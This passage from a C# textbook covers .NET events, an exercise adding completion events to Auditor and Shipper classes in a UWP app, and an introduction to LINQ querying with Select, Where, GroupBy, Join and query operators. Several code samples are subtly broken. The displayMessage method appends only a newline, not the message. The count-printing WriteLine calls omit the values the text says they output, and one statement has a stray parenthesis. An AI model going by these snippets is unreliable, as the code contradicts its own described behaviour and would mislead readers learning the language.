raise the event outside the class results in a compiler error.
Understanding user interface events
As mentioned earlier, the .NET Framework classes and controls used for
building GUIs employ events extensively. For example, the Button class
derives from the ButtonBase class, inheriting a public event called Click of
type RoutedEventHandler. The RoutedEventHandler delegate expects two
parameters: a reference to the object that caused the event to be raised, and a
RoutedEventArgs object that contains additional information about the event:
Click here to view code image
public delegate void RoutedEventHandler(Object sender,
RoutedEventArgs e);
The Button class looks like this:
Click here to view code image
public class ButtonBase: ...
{
public event RoutedEventHandler Click;
...
}
public class Button: ButtonBase
{
...
}
The Button class automatically raises the Click event when you click the
button on the screen. This arrangement makes it easy to create a delegate for
a chosen method and attach that delegate to the required event. The following
example shows the code for a UWP form that contains a button named okay
and the code to connect the Click event of the okay button to the okayClick
Download from finelybook [email protected]
686
method:
Click here to view code image
partial class MainPage :
global::Windows.UI.Xaml.Controls.Page,
global::Windows.UI.Xaml.Markup.IComponentConnector,
global::Windows.UI.Xaml.Markup.IComponentConnector2
{
...
public void Connect(int connectionId, object target)
{
switch(connectionId)
{
case 1:
{
this.okay = (global::Windows.UI.Xaml.Controls.Button)
(target);
...
((global::Windows.UI.Xaml.Controls.Button)this.okay).Click
+= this.okayClick;
...
}
break;
default:
break;
}
this._contentLoaded = true;
}
...
}
This code is usually hidden from you. When you use the Design View
window in Visual Studio 2017 and set the Click property of the okay button
to okayClick in the Extensible Application Markup Language (XAML)
description of the form, Visual Studio 2017 generates this code for you. All
you have to do is write your application logic in the event-handling method,
okayClick, in the part of the code to which you do have access, which is the
MainPage.xaml.cs file in this case:
Click here to view code image
public sealed partial class MainPage : Page
{
...
private void okayClick(object sender, RoutedEventArgs e)
{
// your code to handle the Click event
}
Download from finelybook [email protected]
687
}
The events that the various GUI controls generate always follow the same
pattern. The events are of a delegate type whose signature has a void return
type and two arguments. The first argument is always the sender (the source)
of the event, and the second argument is always an EventArgs argument (or a
class derived from EventArgs).
With the sender argument, you can reuse a single method for multiple
events. The delegated method can examine the sender argument and respond
accordingly. For example, you can use the same method to subscribe to the
Click event for two buttons. (You add the same method to two different
events.) When the event is raised, the code in the method can examine the
sender argument to ascertain which button was clicked.
Using events
In the previous exercise, you amended the Wide World Importers application
to decouple the auditing and shipping logic from the checkout process. The
CheckoutController class that you built invokes the auditing and shipping
components by using a delegate and has no knowledge about these
components or the methods it is running; this is the responsibility of the
application that creates the CheckoutController object and adds the
appropriate references to the delegate. However, it might be useful for a
component to be able to alert the application when it has completed its
processing and enable the application to perform any necessary tidying up.
This might sound a little strange at first—surely when the application
invokes the delegate in the CheckoutController object, the methods
referenced by this delegate run, and the application only continues with the
next statement when these methods have finished. But this is not necessarily
the case! Chapter 24, “Improving response time by performing asynchronous
operations,” demonstrates that methods can run asynchronously, and when
you invoke a method, it might not have completed before execution continues
with the next statement. This is especially true in UWP apps in which long-
running operations are performed on background threads to enable the user
interface to remain responsive. In the Wide World Importers application, in
the CheckoutButtonClicked method, the code that invokes the delegate is
followed by a statement that displays a dialog box with a message indicating
Download from finelybook [email protected]
688
that the order has been placed:
Click here to view code image
private void CheckoutButtonClicked(object sender, RoutedEventArgs e)
{
try
{
// Perform the checkout processing
this.checkoutController.StartCheckoutProcessing(this.order);
// Display a summary of the order
MessageDialog dlg = new MessageDialog(...);
dlg.ShowAsync();
...
}
...
}
In fact, there is no guarantee that the processing performed by the
delegated methods has completed by the time the dialog box appears, so the
message could actually be misleading. This is where an event is invaluable.
The Auditor and Shipper components could both publish an event to which
the application subscribes. This event could be raised by the components only
when they have completed their processing. When the application receives
this event, it can display the message, safe in the knowledge that it is now
accurate.
In the following exercise, you will modify the Auditor and Shipper classes
to raise an event that occurs when they have completed their processing. The
application will subscribe to the event for each component and display an
appropriate message when the event occurs.
Add an event to the CheckoutController class
1. Return to Visual Studio 2017 and display the Delegates solution.
2. In the AuditService project, open the Auditor.cs file in the Code and
Text Editor window.
3. Add a public delegate called AuditingCompleteDelegate to the Auditor
class. This delegate should specify a method that takes a string
parameter called message and that returns a void. The code in bold in the
following example shows the definition of this delegate:
Download from finelybook [email protected]
689
Click here to view code image
public class Auditor
{
public delegate void AuditingCompleteDelegate(string
message);
...
}
4. Add a public event called AuditProcessingComplete to the Auditor class,
after the AuditingCompleteDelegate delegate. This event should be
based on the AuditingCompleteDelegate delegate as shown in bold in
the following code:
Click here to view code image
public class Auditor
{
public delegate void AuditingCompleteDelegate(string
message);
public event AuditingCompleteDelegate
AuditProcessingComplete;
...
}
5. Locate the AuditOrder method. This is the method that is run by using
the delegate in the CheckoutController object. It invokes another private
method called doAuditing to actually perform the audit operation. The
method looks like this:
Click here to view code image
public void AuditOrder(Order order)
{
this.doAuditing(order);
}
6. Scroll down to the doAuditing method. The code in this method is
enclosed in a try/catch block; it uses the XML APIs of the .NET
Framework class library to generate an XML representation of the order
being audited and saves it to a file. (The exact details of how this works
are beyond the scope of this chapter.)
After the catch block, add a finally block that raises the
AuditProcessingComplete event, as shown in the following in bold:
Click here to view code image
Download from finelybook [email protected]
690
private async void doAuditing(Order order)
{
List<OrderItem> ageRestrictedItems =
findAgeRestrictedItems(order);
if (ageRestrictedItems.Count > 0)
{
try
{
...
}
catch (Exception ex)
{
...
}
finally
{
if (this.AuditProcessingComplete != null)
{
this.AuditProcessingComplete($"Audit record
written for Order {order.OrderID}");
}
}
}
}
7. In the DeliveryService project, open the Shipper.cs file in the Code and
Text Editor window.
8. Add a public delegate called ShippingCompleteDelegate to the Shipper
class. This delegate should specify a method that takes a string
parameter called message and that returns a void. The code in bold in the
following example shows the definition of this delegate:
Click here to view code image
public class Shipper
{
public delegate void ShippingCompleteDelegate(string
message);
...
}
9. Add a public event called ShipProcessingComplete to the Shipper class,
based on the ShippingCompleteDelegate delegate as shown in bold in
the following code:
Click here to view code image
public class Shipper
Download from finelybook [email protected]
691
{
public delegate void ShippingCompleteDelegate(string
message);
public event ShippingCompleteDelegate
ShipProcessingComplete;
...
}
10. Find the doShipping method, which is the method that performs the
shipping logic. In the method, after the catch block, add a finally block
that raises the ShipProcessingComplete event, as shown here in bold:
Click here to view code image
private async void doShipping(Order order)
{
try
{
...
}
catch (Exception ex)
{
...
}
finally
{
if (this.ShipProcessingComplete != null)
{
this.ShipProcessingComplete($"Dispatch note
generated for Order
{order.OrderID}");
}
}
}
11. In the Delegates project, display the layout for the MainPage.xaml file in
the Design View window. In the XAML pane, scroll down to the first
set of RowDefinition items. The XAML code looks like this:
Click here to view code image
<Grid Background="{StaticResource
ApplicationPageBackgroundThemeBrush}">
<Grid Margin="12,0,12,0" Loaded="MainPageLoaded">
<Grid.RowDefinitions>
<RowDefinition Height="*"/>
<RowDefinition Height="2*"/>
<RowDefinition Height="*"/>
<RowDefinition Height="10*"/>
<RowDefinition Height="*"/>
Download from finelybook [email protected]
692
</Grid.RowDefinitions>
...
12. Change the Height property of the final RowDefinition item to 2* as
shown in bold in the following code:
<Grid.RowDefinitions>
...
<RowDefinition Height="10*"/>
<RowDefinition Height="2*"/>
</Grid.RowDefinitions>
This change in the layout makes available a bit of space at the bottom of
the form. You will use this space as an area for displaying the messages
received from the Auditor and Shipper components when they raise their
events. Chapter 25, “Implementing the user interface for a Universal
Windows Platform app,” provides more detail on laying out user
interfaces by using a Grid control.
13. Scroll to the bottom of the XAML pane. Add the following ScrollViewer
and TextBlock elements shown in bold before the penultimate </Grid>
tag:
Click here to view code image
...
</Grid>
<ScrollViewer Grid.Row="4"
VerticalScrollBarVisibility="Visible">
<TextBlock x:Name="messageBar" FontSize="18" />
</ScrollViewer>
</Grid>
</Grid>
</Page>
This markup adds a TextBlock control called messageBar to the area at
the bottom of the screen. You will use this control to display messages
from the Auditor and Shipper objects. Again, you will learn more about
grid layouts in Chapter 25.
14. Display the MainPage.xaml.cs file in the Code and Text Editor window.
Find the CheckoutButtonClicked method and remove the code that
displays the summary of the order. The try block should look like this
after you have deleted the code:
Click here to view code image
Download from finelybook [email protected]
693
private void CheckoutButtonClicked(object sender,
RoutedEventArgs e)
{
try
{
// Perform the checkout processing
this.checkoutController.StartCheckoutProcessing(this.order);
// Clear out the order details so the user can start
again with a new order
this.order = new Order
{
Date = DateTime.Now,
Items = new List<OrderItem>(),
OrderID = Guid.NewGuid(),
TotalValue = 0
};
this.orderDetails.DataContext = null;
this.orderValue.Text = $"{order.TotalValue:C}");
this.listViewHeader.Visibility = Visibility.Collapsed;
this.checkout.IsEnabled = false;
}
catch (Exception ex)
{
...
}
}
15. Add a private method called displayMessage to the MainPage class.
This method should take a string parameter called message and should
return a void. In the body of this method, add a statement that appends
the value in the message parameter to the Text property of the
messageBar TextBlock control, followed by a newline character, as
shown here in bold:
Click here to view code image
private void displayMessage(string message)
{
this.messageBar.Text += $"{Environment.NewLine}";
}
This code causes the message to appear in the message area at the
bottom of the form.
16. Find the constructor for the MainPage class and add the code shown
here in bold:
Click here to view code image
Download from finelybook [email protected]
694
public MainPage()
{
...
this.auditor = new Auditor();
this.shipper = new Shipper();
this.checkoutController = new CheckoutController();
this.checkoutController.CheckoutProcessing +=
this.auditor.AuditOrder;
this.checkoutController.CheckoutProcessing +=
this.shipper.ShipOrder;
this.auditor.AuditProcessingComplete += this.displayMessage;
this.shipper.ShipProcessingComplete += this.displayMessage;
}
These statements subscribe to the events exposed by the Auditor and
Shipper objects. When the events are raised, the displayMessage method
runs. Notice that the same method handles both events.
17. On the Debug menu, click Start Debugging to build and run the
application.
18. When the Wide World Importers form appears, select some items
(include at least one age-restricted item), and then click Checkout.
19. Verify that the “Audit record written” message appears in the TextBlock
at the bottom of the form, followed by the “Dispatch note generated”
message:
Download from finelybook [email protected]
695
20. Place further orders and note the new messages that appear each time
you click Checkout (you might need to scroll down to see them when
the message area fills up).
21. When you have finished, return to Visual Studio 2017 and stop
debugging.
Summary
In this chapter, you learned how to use delegates to reference methods and
invoke those methods. You also saw how to define lambda expressions that
can be run by using a delegate. Finally, you learned how to define and use
events to trigger execution of a method.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 21.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Download from finelybook [email protected]
696
Quick reference
To
Do this
Declare a
delegate type
Write the keyword delegate, followed by the return type,
followed by the name of the delegate type, followed by any
parameter types. For example:
delegate void myDelegate();
Create an
instance of a
delegate
initialized
with a single
specific
method
Use the same syntax you use for a class or structure: write
the keyword new, followed by the name of the type (the
name of the delegate), followed by the argument between
parentheses. The argument must be a method whose
signature exactly matches the signature of the delegate. For
example:
Click here to view code image
delegate void myDelegate();
private void myMethod() { ... }
...
myDelegate del = new myDelegate(this.myMethod);
Invoke a
delegate
Use the same syntax as a method call. For example:
Click here to view code image
myDelegate del;
...
del();
Declare an
event
Write the keyword event, followed by the name of the type
(the type must be a delegate type), followed by the name of
the event. For example:
Click here to view code image
class MyClass
{
public delegate void MyDelegate();
...
public event myDelegate MyEvent;
}
Subscribe to
an event
Create a delegate instance (of the same type as the event),
and attach the delegate instance to the event by using the +=
Download from finelybook [email protected]
697
operator. For example:
Click here to view code image
class MyEventHandlingClass
{
private MyClass myClass = new MyClass();
...
public void Start()
{
myClass.MyEvent +=
new myClass.MyDelegate
(this.eventHandlingMethod);
}
private void eventHandlingMethod()
{
...
}
}
You can also get the compiler to generate the new delegate
automatically simply by specifying the subscribing method:
Click here to view code image
public void Start()
{
myClass.MyEvent +=
this.eventHandlingMethod;
}
Unsubscribe
from an event
Create a delegate instance (of the same type as the event),
and detach the delegate instance from the event by using the
–= operator. For example:
Click here to view code image
class MyEventHandlingClass
{
private MyClass myClass = new MyClass();
...
public void Stop()
{
myClass.MyEvent -=
new myClass.MyDelegate
(this.eventHandlingMethod);
}
...
}
Download from finelybook [email protected]
698
Or:
Click here to view code image
public void Stop()
{
myClass.MyEvent -=
this.eventHandlingMethod;
}
Raise an
event
Use the same syntax as a method call. You must supply
arguments to match the type of the parameters expected by
the delegate referenced by the event. Don’t forget to check
whether the event is null. For example:
Click here to view code image
class MyClass
{
public event myDelegate MyEvent;
...
private void RaiseEvent()
{
if (this.MyEvent != null)
{
this.MyEvent();
}
}
...
}
Download from finelybook [email protected]
699
CHAPTER 21
Querying in-memory data by using
query expressions
After completing this chapter, you will be able to:
Define Language-Integrated Query (LINQ) queries to examine the
contents of enumerable collections.
Use LINQ extension methods and query operators.
Explain how LINQ defers evaluation of a query and how you can force
immediate execution and cache the results of a LINQ query.
You have now met most of the features of the C# language. However, so
far I have glossed over one important aspect of the language that is likely to
be used by many applications: the support that C# provides for querying data.
You have seen that you can define structures and classes for modeling data
and that you can use collections and arrays for temporarily storing data in
memory. However, how do you perform common tasks such as searching for
items in a collection that match a specific set of criteria? For example, if you
have a collection of Customer objects, how do you find all customers that are
located in London, or how can you find out which town has the most
customers who have procured your services? You can write your own code to
iterate through a collection and examine the fields in each object, but these
types of tasks occur so often that the designers of C# decided to include
features in the language to minimize the amount of code you need to write. In
this chapter, you will learn how to use these advanced C# language features
Download from finelybook [email protected]
700
to query and manipulate data.
What is LINQ?
All but the most trivial of applications need to process data. Historically,
most applications provided their own logic for performing these operations.
However, this strategy can lead to the code in an application becoming very
tightly coupled with the structure of the data that it processes. If the data
structures change, you might need to make a significant number of changes to
the code that handles the data. The designers of the Microsoft .NET
Framework thought long and hard about these issues and decided to make the
life of an application developer easier by providing features that abstract the
mechanism that an application uses to query data from application code itself.
These features are called Language-Integrated Query, or LINQ.
The creators of LINQ took an unabashed look at the way in which
relational database management systems such as Microsoft SQL Server
separate the language used to query a database from the internal format of the
data in the database. Developers accessing a SQL Server database issue
Structured Query Language (SQL) statements to the database management
system. SQL provides a high-level description of the data that the developer
wants to retrieve but does not indicate exactly how the database management
system should retrieve this data. These details are controlled by the database
management system itself. Consequently, an application that invokes SQL
statements does not care how the database management system physically
stores or retrieves data. The format used by the database management system
can change (for example, if a new version is released) without the application
developer needing to modify the SQL statements used by the application.
LINQ provides syntax and semantics very reminiscent of SQL and with
many of the same advantages. You can change the underlying structure of the
data being queried without needing to change the code that actually performs
the queries. You should be aware that although LINQ looks similar to SQL, it
is far more flexible and can handle a wider variety of logical data structures.
For example, LINQ can handle data organized hierarchically, such as that
found in an XML document. However, this chapter concentrates on using
LINQ in a relational manner.
Download from finelybook [email protected]
701
Using LINQ in a C# application
Perhaps the easiest way to explain how to use the C# features that support
LINQ is to work through some simple examples based on the following sets
of customer and address information:
CUSTOMER INFORMATION
CustomerID
FirstName
LastName
CompanyName
1
Kim
Abercrombie
Alpine Ski House
2
Jeff
Hay
Coho Winery
3
Charlie
Herb
Alpine Ski House
4
Chris
Preston
Trey Research
5
Dave
Barnett
Wingtip Toys
6
Ann
Beebe
Coho Winery
7
John
Kane
Wingtip Toys
8
David
Simpson
Trey Research
9
Greg
Chapman
Wingtip Toys
10
Tim
Litton
Wide World Importers
ADDRESS INFORMATION
CompanyName
City
Country
Alpine Ski House
Berne
Switzerland
Coho Winery
San Francisco
United States
Trey Research
New York
United States
Wingtip Toys
London
United Kingdom
Wide World Importers
Tetbury
United Kingdom
LINQ requires the data to be stored in a data structure that implements the
IEnumerable or IEnumerable<T> interface, as described in Chapter 19,
”Enumerating collections.” It does not matter what structure you use (an
array, a HashSet<T>, a Queue<T>, or any of the other collection types, or
Download from finelybook [email protected]
702
even one that you define yourself) as long as it is enumerable. However, to
keep things straightforward, the examples in this chapter assume that the
customer and address information is held in the customers and addresses
arrays shown in the following code example.
Note In a real-world application, you would populate these arrays by
reading the data from a file or a database.
Click here to view code image
var customers = new[] {
new { CustomerID = 1, FirstName = "Kim", LastName =
"Abercrombie",
CompanyName = "Alpine Ski House" },
new { CustomerID = 2, FirstName = "Jeff", LastName = "Hay",
CompanyName = "Coho Winery" },
new { CustomerID = 3, FirstName = "Charlie", LastName = "Herb",
CompanyName = "Alpine Ski House" },
new { CustomerID = 4, FirstName = "Chris", LastName = "Preston",
CompanyName = "Trey Research" },
new { CustomerID = 5, FirstName = "Dave", LastName = "Barnett",
CompanyName = "Wingtip Toys" },
new { CustomerID = 6, FirstName = "Ann", LastName = "Beebe",
CompanyName = "Coho Winery" },
new { CustomerID = 7, FirstName = "John", LastName = "Kane",
CompanyName = "Wingtip Toys" },
new { CustomerID = 8, FirstName = "David", LastName = "Simpson",
CompanyName = "Trey Research" },
new { CustomerID = 9, FirstName = "Greg", LastName = "Chapman",
CompanyName = "Wingtip Toys" },
new { CustomerID = 10, FirstName = "Tim", LastName = "Litton",
CompanyName = "Wide World Importers" }
};
var addresses = new[] {
new { CompanyName = "Alpine Ski House", City = "Berne",
Country = "Switzerland"},
new { CompanyName = "Coho Winery", City = "San Francisco",
Country = "United States"},
new { CompanyName = "Trey Research", City = "New York",
Country = "United States"},
new { CompanyName = "Wingtip Toys", City = "London",
Country = "United Kingdom"},
Download from finelybook [email protected]
703
new { CompanyName = "Wide World Importers", City = "Tetbury",
Country = "United Kingdom"}
};
Note The sections “Selecting data,” “Filtering data,” “Ordering,
grouping, and aggregating data,” and “Joining data” that follow show
you the basic capabilities and syntax for querying data by using LINQ
methods. The syntax can become a little complex at times, and you will
see when you reach the section “Using query operators” that it is not
actually necessary to remember how all the syntax works. However, it
is useful for you to at least take a look at these sections so that you can
fully appreciate how the query operators provided with C# perform their
tasks.
Selecting data
Note The code for the examples shown in this section is available in the
LINQSamples solution, located in the \Microsoft Press\VCSBS\Chapter
21\LINQSamples folder in your Documents folder.
Suppose that you want to display a list consisting of the first name of each
customer in the customers array. You can achieve this task with the following
code:
Click here to view code image
IEnumerable<string> customerFirstNames =
customers.Select(cust => cust.FirstName);
foreach (string name in customerFirstNames)
{
Console.WriteLine(name);
Download from finelybook [email protected]
704
}
Although this block of code is quite short, it does a lot, and it requires a
degree of explanation, starting with the use of the Select method of the
customers array.
Using the Select method, you can retrieve specific data from the array—in
this case, just the value in the FirstName field of each item in the array. How
does it work? The parameter to the Select method is actually another method
that takes a row from the customers array and returns the selected data from
that row. You can define your own custom method to perform this task, but
the simplest mechanism is to use a lambda expression to define an
anonymous method, as shown in the preceding example. There are three
important things that you need to understand at this point:
The variable cust is the parameter passed into the method. You can
think of cust as an alias for each row in the customers array. The
compiler deduces this from the fact that you are calling the Select
method on the customers array. You can use any legal C# identifier in
place of cust.
The Select method does not actually retrieve the data at this time; it
simply returns an enumerable object that will fetch the data identified
by the Select method when you iterate over it later. We will return to
this aspect of LINQ in the section ”LINQ and deferred evaluation”
later in this chapter.
The Select method is not actually a method of the Array type. It is an
extension method of the Enumerable class. The Enumerable class is
located in the System.Linq namespace and provides a substantial set of
static methods for querying objects that implement the generic
IEnumerable<T> interface.
The preceding example uses the Select method of the customers array to
generate an IEnumerable<string> object named customerFirstNames. (It is
of type IEnumerable<string> because the Select method returns an
enumerable collection of customer first names, which are strings.) The
foreach statement iterates through this collection of strings, printing out the
first name of each customer in the following sequence:
Click here to view code image
Download from finelybook [email protected]
705
Kim
Jeff
Charlie
Chris
Dave
Ann
John
David
Greg
Tim
You can now display the first name of each customer. How do you fetch
the first and last name of each customer? This task is slightly trickier. If you
examine the definition of the Enumerable.Select method in the System.Linq
namespace in the documentation supplied with Microsoft Visual Studio 2017,
you will see that it looks like this:
Click here to view code image
public static IEnumerable<TResult> Select<TSource, TResult> (
this IEnumerable<TSource> source,
Func<TSource, TResult> selector
)
What this actually says is that Select is a generic method that takes two
type parameters named TSource and TResult as well as two ordinary
parameters named source and selector. TSource is the type of the collection
for which you are generating an enumerable set of results (customer objects
in this example), and TResult is the type of the data in the enumerable set of
results (string objects in this example). Remember that Select is an extension
method, so the source parameter is actually a reference to the type being
extended (a generic collection of customer objects that implements the
IEnumerable interface in the example). The selector parameter specifies a
generic method that identifies the fields to be retrieved. (Remember that Func
is the name of a generic delegate type in the .NET Framework that you can
use for encapsulating a generic method that returns a result.) The method
referred to by the selector parameter takes a TSource (in this case, customer)
parameter and yields a TResult (in this case, string) object. The value
returned by the Select method is an enumerable collection of TResult (again
string) objects.
Download from finelybook [email protected]
706
Note Chapter 12, ”Working with inheritance,” explains how extension
methods work and the role of the first parameter to an extension
method.
The important point to understand from the preceding paragraph is that the
Select method returns an enumerable collection based on a single type. If you
want the enumerator to return multiple items of data, such as the first and last
name of each customer, you have at least two options:
You can concatenate the first and last names together into a single
string in the Select method, like this:
Click here to view code image
IEnumerable<string> customerNames =
customers.Select(cust => $"{cust.FirstName}
{cust.LastName}");
You can define a new type that wraps the first and last names and use
the Select method to construct instances of this type, like this:
Click here to view code image
class FullName
{
public string FirstName{ get; set; }
public string LastName{ get; set; }
}
...
IEnumerable<FullName> customerFullNames =
customers.Select(cust => new FullName
{
FirstName = cust.FirstName,
LastName = cust.LastName
});
The second option is arguably preferable, but if this is the only use
that your application makes of the Names type, you might prefer to use
an anonymous type, as in the following, instead of defining a new type
specifically for a single operation:
Click here to view code image
Download from finelybook [email protected]
707
var customerFullNames =
customers.Select(cust => new
{
FirstName = cust.FirstName,
LastName = cust.LastName
});
Notice the use of the var keyword here to define the type of the
enumerable collection. The type of objects in the collection is anonymous, so
you do not know the specific type of the objects in the collection.
Filtering data
With the Select method, you can specify, or project, the fields that you want
to include in the enumerable collection. However, you might also want to
restrict the rows that the enumerable collection contains. For example,
suppose you want to list only the names of companies in the addresses array
that are located in the United States. To do this, you can use the Where
method, as follows:
Click here to view code image
IEnumerable<string> usCompanies = addresses
.Where(addr => String.Equals(addr.Country,"United States"))
.Select(usComp => usComp.CompanyName);
foreach (string name in usCompanies)
{
Console.WriteLine(name);
}
Syntactically, the Where method is similar to Select. It expects a
parameter that defines a method that filters the data according to whatever
criteria you specify. This example makes use of another lambda expression.
The variable addr is an alias for a row in the addresses array, and the lambda
expression returns all rows where the Country field matches the string
“United States”. The Where method returns an enumerable collection of rows
containing every field from the original collection. The Select method is then
applied to these rows to project only the CompanyName field from this
enumerable collection to return another enumerable collection of string
objects. (The variable usComp is an alias for the type of each row in the
enumerable collection returned by the Where method.) The type of the result
of this complete expression is, therefore, IEnumerable<string>. It is
Download from finelybook [email protected]
708
important to understand this sequence of operations—the Where method is
applied first to filter the rows, followed by the Select method to specify the
fields. The foreach statement that iterates through this collection displays the
following companies:
Coho Winery
Trey Research
Ordering, grouping, and aggregating data
If you are familiar with SQL, you are aware that it makes it possible for you
to perform a wide variety of relational operations besides simple projection
and filtering. For example, you can specify that you want data to be returned
in a specific order, you can group the rows returned according to one or more
key fields, and you can calculate summary values based on the rows in each
group. LINQ provides the same functionality.
To retrieve data in a particular order, you can use the OrderBy method.
Like the Select and Where methods, OrderBy expects a method as its
argument. This method identifies the expressions that you want to use to sort
the data. For example, you can display the name of each company in the
addresses array in ascending order, like this:
Click here to view code image
IEnumerable<string> companyNames = addresses
.OrderBy(addr => addr.CompanyName)
.Select(comp => comp.CompanyName);
foreach (string name in companyNames)
{
Console.WriteLine(name);
}
This block of code displays the companies in the addresses table in
alphabetical order.
Alpine Ski House
Coho Winery
Trey Research
Wide World Importers
Wingtip Toys
If you want to enumerate the data in descending order, you can use the
Download from finelybook [email protected]
709
OrderByDescending method instead. If you want to order by more than one
key value, you can use the ThenBy or ThenByDescending method after
OrderBy or OrderByDescending.
To group data according to common values in one or more fields, you can
use the GroupBy method. The following example shows how to group the
companies in the addresses array by country:
Click here to view code image
var companiesGroupedByCountry = addresses
.GroupBy(addrs => addrs.Country);
foreach (var companiesPerCountry in companiesGroupedByCountry)
{
Console.WriteLine(
$"Country:
{companiesPerCountry.Key}\t{companiesPerCountry.Count()} companies");
foreach (var companies in companiesPerCountry)
{
Console.WriteLine($"\t{companies.CompanyName}");
}
}
By now, you should recognize the pattern. The GroupBy method expects a
method that specifies the fields by which to group the data. However, there
are some subtle differences between the GroupBy method and the other
methods that you have seen so far.
The main point of interest is that you don’t need to use the Select method
to project the fields to the result. The enumerable set returned by GroupBy
contains all the fields in the original source collection, but the rows are
ordered into a set of enumerable collections based on the field identified by
the method specified by GroupBy. In other words, the result of the GroupBy
method is an enumerable set of groups, each of which is an enumerable set of
rows. In the example just shown, the enumerable set
companiesGroupedByCountry is a set of countries. The items in this set are
themselves enumerable collections containing the companies for each country
in turn. The code that displays the companies in each country uses a foreach
loop to iterate through the companiesGroupedByCountry set to yield and
display each country in turn, and then it uses a nested foreach loop to iterate
through the set of companies in each country. Notice in the outer foreach
loop that you can access the value you are grouping by using the Key field of
Download from finelybook [email protected]
710
each item, and you can also calculate summary data for each group by using
methods such as Count, Max, Min, and many others. The output generated by
the example code looks like this:
Click here to view code image
Country: Switzerland 1 companies
Alpine Ski House
Country: United States 2 companies
Coho Winery
Trey Research
Country: United Kingdom 2 companies
Wingtip Toys
Wide World Importers
You can use many of the summary methods such as Count, Max, and Min
directly over the results of the Select method. If you want to know how many
companies there are in the addresses array, you can use a block of code such
as this:
Click here to view code image
int numberOfCompanies = addresses
.Select(addr => addr.CompanyName).Count();
Console.WriteLine($"Number of companies: ");
Notice that the result of these methods is a single scalar value rather than
an enumerable collection. The output from the preceding block of code looks
like this:
Number of companies: 5
I should utter a word of caution at this point. These summary methods do
not distinguish between rows in the underlying set that contain duplicate
values in the fields you are projecting. This means that strictly speaking, the
preceding example shows you only how many rows in the addresses array
contain a value in the CompanyName field. If you wanted to find out how
many different countries are mentioned in this table, you might be tempted to
try this:
Click here to view code image
int numberOfCountries = addresses
.Select(addr => addr.Country).Count();
Console.WriteLine($"Number of countries: ");
The output looks like this:
Download from finelybook [email protected]
711
Number of countries: 5
In fact, the addresses array includes only three different countries; it just
so happens that United States and United Kingdom both occur twice. You
can eliminate duplicates from the calculation by using the Distinct method,
like this:
Click here to view code image
int numberOfDistinctCountries = addresses
.Select(addr => addr.Country).Distinct().Count();
Console.WriteLine($"Number of distinct countries: ");
The Console.WriteLine statement now outputs the expected result:
Number of countries: 3
Joining data
Just like SQL, LINQ gives you the ability to join together multiple sets of
data over one or more common key fields. The following example shows
how to display the first and last names of each customer, together with the
name of the country where the customer is located:
Click here to view code image
var companiesAndCustomers = customers
.Select(c => new { c.FirstName, c.LastName, c.CompanyName })
.Join(addresses, custs => custs.CompanyName, addrs =>
addrs.CompanyName,
(custs, addrs) => new {custs.FirstName, custs.LastName, addrs.Country
});
foreach (var row in companiesAndCustomers)
{
Console.WriteLine(row);
}
The customers’ first and last names are available in the customers array,
but the country for each company that customers work for is stored in the
addresses array. The common key between the customers array and the
addresses array is the company name. The Select method specifies the fields
of interest in the customers array (FirstName and LastName), together with
the field containing the common key (CompanyName). You use the Join
method to join the data identified by the Select method with another
Download from finelybook [email protected]
712
enumerable collection. The parameters to the Join method are as follows:
The enumerable collection with which to join
A method that identifies the common key fields from the data
identified by the Select method
A method that identifies the common key fields on which to join the
selected data
A method that specifies the columns you require in the enumerable
result set returned by the Join method
In this example, the Join method joins the enumerable collection
containing the FirstName, LastName, and CompanyName fields from the
customers array with the rows in the addresses array. The two sets of data are
joined where the value in the CompanyName field in the customers array
matches the value in the CompanyName field in the addresses array. The
result set includes rows containing the FirstName and LastName fields from
the customers array with the Country field from the addresses array. The
code that outputs the data from the companiesAndCustomers collection
displays the following information:
Click here to view code image
{ FirstName = Kim, LastName = Abercrombie, Country = Switzerland }
{ FirstName = Jeff, LastName = Hay, Country = United States }
{ FirstName = Charlie, LastName = Herb, Country = Switzerland }
{ FirstName = Chris, LastName = Preston, Country = United States }
{ FirstName = Dave, LastName = Barnett, Country = United Kingdom }
{ FirstName = Ann, LastName = Beebe, Country = United States }
{ FirstName = John, LastName = Kane, Country = United Kingdom }
{ FirstName = David, LastName = Simpson, Country = United States }
{ FirstName = Greg, LastName = Chapman, Country = United Kingdom }
{ FirstName = Tim, LastName = Litton, Country = United Kingdom }
Note Remember that collections in memory are not the same as tables
in a relational database, and the data they contain is not subject to the
same data integrity constraints. In a relational database, it could be
acceptable to assume that every customer has a corresponding company
and that each company has its own unique address. Collections do not
Download from finelybook [email protected]
713
enforce the same level of data integrity, meaning that you can quite
easily have a customer referencing a company that does not exist in the
addresses array, and you might even have the same company occurring
more than once in the addresses array. In these situations, the results
that you obtain might be accurate but unexpected. Join operations work
best when you fully understand the relationships between the data you
are joining.
Using query operators
The preceding sections have shown you many of the features available for
querying in-memory data by using the extension methods for the Enumerable
class defined in the System.Linq namespace. The syntax makes use of several
advanced C# language features, and the resultant code can sometimes be
quite hard to understand and maintain. To relieve you of some of this burden,
the designers of C# added query operators to the language with which you
can employ LINQ features by using a syntax more akin to SQL.
As you saw in the examples shown earlier in this chapter, you can retrieve
the first name for each customer like this:
Click here to view code image
IEnumerable<string> customerFirstNames = customers
.Select(cust => cust.FirstName);
You can rephrase this statement by using the from and select query
operators, like this:
Click here to view code image
var customerFirstNames = from cust in customers
select cust.FirstName;
At compile time, the C# compiler resolves this expression into the
corresponding Select method. The from operator defines an alias for the
source collection, and the select operator specifies the fields to retrieve by
using this alias. The result is an enumerable collection of customer first
names. If you are familiar with SQL, notice that the from operator occurs
before the select operator.
Download from finelybook [email protected]
714
Continuing in the same vein, to retrieve the first and last names for each
customer, you can use the following statement. (You might want to refer to
the earlier example of the same statement based on the Select extension
method.)
Click here to view code image
var customerNames = from cust in customers
select new { cust.FirstName, cust.LastName };
You use the where operator to filter data. The following example shows
how to return the names of the companies based in the United States from the
addresses array:
Click here to view code image
var usCompanies = from a in addresses
where String.Equals(a.Country,"United States")
select a.CompanyName;
To order data, use the orderby operator, like this:
Click here to view code image
var companyNames = from a in addresses
orderby a.CompanyName
select a.CompanyName;
You can group data by using the group operator in the following manner:
Click here to view code image
var companiesGroupedByCountry = from a in addresses
group a by a.Country;
Notice that, as with the earlier example showing how to group data, you
do not provide the select operator, and you can iterate through the results by
using the same code as the earlier example, like this:
Click here to view code image
foreach (var companiesPerCountry in companiesGroupedByCountry)
{
Console.WriteLine(
$"Country:
